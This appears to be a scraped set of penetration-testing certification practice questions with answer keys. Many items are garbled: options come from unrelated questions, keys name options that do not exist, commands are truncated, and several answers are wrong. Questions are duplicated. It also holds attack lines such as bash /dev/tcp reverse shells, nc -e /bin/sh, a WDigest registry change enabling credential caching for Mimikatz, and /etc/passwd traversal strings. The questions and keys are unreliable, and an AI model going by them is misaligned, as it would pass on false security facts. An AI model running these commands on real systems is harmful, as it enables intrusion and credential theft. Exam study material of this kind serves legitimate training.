Question #1
A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?
A. Stored XSS
B. Full path disclosure
C. Expired certificate
D. Clickjacking
Correct answer: A
Question #2
During an internal network penetration test, a tester recovers the NTLM password hash for a user known to have full administrator privileges on a number of target systems. Efforts to crack the hash and recover the plaintext password have been unsuccessful. Which of the following would be the BEST target for continued exploitation efforts?
A. Operating system: Windows 7 Open ports: 23, 161
B. Operating system: Windows Server 2016 Open ports: 53, 5900
C. Operating system: Windows 8
D. Operating system: Windows 8 Open ports: 514, 3389
Correct answer: C
Question #3
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Credential dump attack
B. DLL injection attack
C. Reverse shell attack
D. Pass the hash attack
Correct answer: CDE
Question #4
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?
A. Ettercap
B. Tcpdump
C. Responder
D. Medusa
Correct answer: C
Question #5
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
Correct answer: A
Question #6
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
Correct answer: A
Question #7
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
A. The latest vulnerability scan results
B. A list of sample application requests
C. An up-to-date list of possible exploits
D. A list of sample test accounts
Correct answer: B
Question #8
A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?
A. Insecure file permissions
B. Application whitelisting
C. Shell escape
D. Writable service
Correct answer: A
Question #9
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
Correct answer: A
Question #10
An engineer, who is conducting a penetration test for a web application, discovers the user login process sends form field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. HTTP POST method
B. HTTP OPTIONS method
C. HTTP PUT method
D. HTTP TRACE method
Correct answer: A
Question #11
A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd Which of the following attack types is MOST likely to be the vulnerability?
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
Correct answer: B
Question #12
An attacker uses SET to make a copy of a company’s cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO’s login credentials. Which of the following types of attacks is this an example of?
A. Elicitation attack
B. Impersonation attack
C. Spear phishing attack
D. Drive-by download attack
Correct answer: A
Question #13
During the information gathering phase of a network penetration test for the corp.local domain, which of the following commands would provide a list of domain controllers?
A. nslookup -type=srv _ldap
B. nmap -sV -p 389 --script=ldap-rootdse corp
C. net group “Domain Controllers” /domain
D. gpresult /d corp
Correct answer: A
Question #14
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. fpipe
B. ike-scan -A -t 1 --sourceip=spoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
Correct answer: B
Question #15
Click the exhibit button. A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
A. SNMP brute forcing
B. ARP spoofing
C. DNS cache poisoning
D. SMTP relay
Correct answer: A
Question #16
Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own. Which of the following URLs can he use to accomplish this attack?
A. https://testbank
B. https://testbank
C. https://testbank
D. https://testbank
Correct answer: B
Question #17
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Correct answer: D
Question #18
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A. Download the GHOST file to a Linux system and compile gcc -o GHOSTtest i:
B. Download the GHOST file to a Windows system and compile gcc -o GHOST GHOST
C. Download the GHOST file to a Linux system and compile gcc -o GHOST GHOST
D. Download the GHOST file to a Windows system and compile gcc -o GHOSTtest i:
Correct answer: C
Question #19
A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?
A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack
Correct answer: B
Question #20
During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command: c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db Which of the following file system vulnerabilities does this command take advantage of?
A. Hierarchical file system
B. Alternate data streams
C. Backdoor success
D. Extended file system
Correct answer: B
Question #21
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
Correct answer: A
Question #22
A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting “True”. Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)
A. SOW
B. NDA
C. EULA
D. PA
Correct answer: BD
Question #23
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
Correct answer: C
Question #24
Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).
A. MAC address of the client
B. MAC address of the domain controller
C. MAC address of the web server
D. MAC address of the gateway
Correct answer: AE
Question #25
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands: export XHOST 192
B. From the local computer, run the following command: ssh -L4444:127
C. From the remote computer, run the following command: ssh -R6000:127
D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192
Correct answer: A
Question #26
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
Correct answer: D
Question #27
Which of the following is an example of a spear phishing attack?
A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file
Correct answer: A
Question #28
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?
A. Penetration test findings often contain company intellectual property
B. Penetration test findings could lead to consumer dissatisfaction if made public
C. Penetration test findings are legal documents containing privileged information
D. Penetration test findings can assist an attacker in compromising a system
Correct answer: D
Question #29
During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?
A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim
Correct answer: B
Question #30
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:
- Code review
- Updates to firewall settings
Which of the following has occurred in this situation?
A. Enumeration of services
B. OSINT gathering
C. Port scanning
D. Social engineering
Correct answer: A
Question #31
A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5 The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
A. The organization failed to disable Telnet
B. Nmap results contain a false positive for port 23
C. Port 22 was filtered
D. The service is running on a non-standard port
Correct answer: A
Question #32
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing
Correct answer: B
Question #33
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?
A. Perform an HTTP downgrade attack
B. Harvest the user credentials to decrypt traffic
C. Perform an MITM attack
D. Implement a CA attack by impersonating trusted CAs
Correct answer: A
Question #34
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. ICS vendors are slow to implement adequate security controls
B. ICS staff are not adequately trained to perform basic duties
C. There is a scarcity of replacement equipment for critical devices
D. There is a lack of compliance for ICS facilities
Correct answer: B
Question #35
A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:
- XSS
- HTTP DELETE method allowed
- SQL injection
- Vulnerable to CSRF
To which of the following should the tester give the HIGHEST priority?
A. SQL injection
B. HTTP DELETE method allowed
C. Vulnerable to CSRF
D. XSS
Correct answer: B
Question #36
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo “8
Correct answer: A
Question #37
Given the following: http://example.com/download.php?id-.../.../.../etc/passwd Which of the following BEST describes the above attack?
A. Malicious file upload attack
B. Redirect attack
C. Directory traversal attack
D. Insecure direct object reference attack
Correct answer: C
Question #38
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. Manufacturers developing IoT devices are less concerned with security
B. It is difficult for administrators to implement the same security standards across the board
C. IoT systems often lack the hardware power required by more secure solutions
D. Regulatory authorities often have lower security requirements for IoT systems
Correct answer: BC
Question #39
For which of the following reasons does a penetration tester need to have a customer’s point-of-contact information available at all times? (Choose three.)
A. LSASS
B. SAM database
C. Active Directory
D. Registry
Correct answer: ACF
Question #40
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
A. schtasks
B. net session server | dsquery -user | net use c$
C. powershell && set-executionpolicy unrestricted
D. reg save HKLM\System\CurrentControlSet\Services\Sv
Correct answer: D
Question #41
A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?
A. Horizontally escalate privileges
B. Scrape the page for hidden fields
C. Analyze HTTP response code
D. Search for HTTP headers
Correct answer: B
Question #42
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?
A. Common libraries
B. Configuration files
C. Sandbox escape
D. ASLR bypass
Correct answer: A
Question #43
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
Correct answer: AB
Question #44
A penetration tester is reviewing the following output from a wireless sniffer: Which of the following can be extrapolated from the above information?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
Correct answer: C
Question #45
A penetration tester runs the following from a compromised ‘python -c ‘import pty;pty.spawn (“/bin/bash”) ’. Which of the following actions are the tester taking?
A. Removing the Bash history
B. Upgrading the shell
C. Creating a sandbox
D. Capturing credentials
Correct answer: B
Question #46
A client requests that a penetration tester emulate a help desk technician who was recently laid off. Which of the following BEST describes the abilities of the threat actor?
A. Advanced persistent threat
B. Script kiddie
C. Hacktivist
D. Organized crime
Correct answer: B
Question #47
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing
B. Implement new training to be aware of the risks in accessing the application
C. Implement an ACL to restrict access to the application exclusively to the finance department
D. Require payroll users to change the passwords used to authenticate to the application
Correct answer: B
Question #48
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
Correct answer: D
Question #49
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?
A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis
Correct answer: A
Question #50
The following command is run on a Linux file system: chmod 4111 /usr/bin/sudo Which of the following issues may be exploited now?
A. Kernel vulnerabilities
B. Sticky bits
C. Unquoted service path
D. Misconfigured sudo
Correct answer: B
Question #51
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
Correct answer: D
Question #52
The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describes what the command does?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
Correct answer: C
Question #53
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?
A. The badge was cloned
B. The physical access control server is malfunctioning
C. The system reached the crossover error rate
D. The employee lost the badge
Correct answer: A
Question #54
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
A. Nikto
B. WAR
C. W3AF
D. Swagger
Correct answer: D
Question #55
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users "DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
Correct answer: D
Question #56
In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
A. Brute force the user’s password
B. Perform an ARP spoofing attack
C. Leverage the BeEF framework to capture credentials
D. Conduct LLMNR/NETBIOS-ns poisoning
Correct answer: A
Question #57
In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?
A. Brute force the user’s password
B. Perform an ARP spoofing attack
C. Leverage the BeEF framework to capture credentials
D. Conduct LLMNR/NETBIOS-ns poisoning
Correct answer: A
Question #58
A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1
Correct answer: D
Question #59
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
A. arpspoof
B. nmap
C. responder
D. burpsuite
Correct answer: A
Question #60
Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)
A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation
B. Identify the issues that can be remediated most quickly and address them first
C. Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long time
Correct answer: BD
Question #61
HOTSPOT
Instructions: Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.
Hot Area:
A. See Explanation section for answer
Correct answer: A
Question #62
A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?
A. The badge was cloned
B. The physical access control server is malfunctioning
C. The system reached the crossover error rate
D. The employee lost the badge
Correct answer: A
Question #63
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192
B. run autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. use auxiliary/server/socks4a
Correct answer: A
Question #64
Which of the following is the purpose of an NDA?
A. Outlines the terms of confidentiality between both parties
B. Outlines the boundaries of which systems are authorized for testing
C. Outlines the requirements of technical testing that are allowed
D. Outlines the detailed configuration of the network
Correct answer: A
Question #65
A penetration tester, who is not on the client’s network, is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125 Which of the following commands would be BEST to return results?
A. nmap -Pn -sT 100
B. nmap -sF -p 100
C. nmap -sV -oA output 100
D. nmap 100
Correct answer: A
Question #66
Given the following Python script: Which of the following is where the output will go?
A. To the screen
B. To a network server
C. To a file
D. To /dev/null
Correct answer: C
Question #67
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. TCP SYN flood
B. SQL injection
C. XSS
D. XMAS scan
Correct answer: B
Question #68
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
Correct answer: D
Question #69
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
Correct answer: A
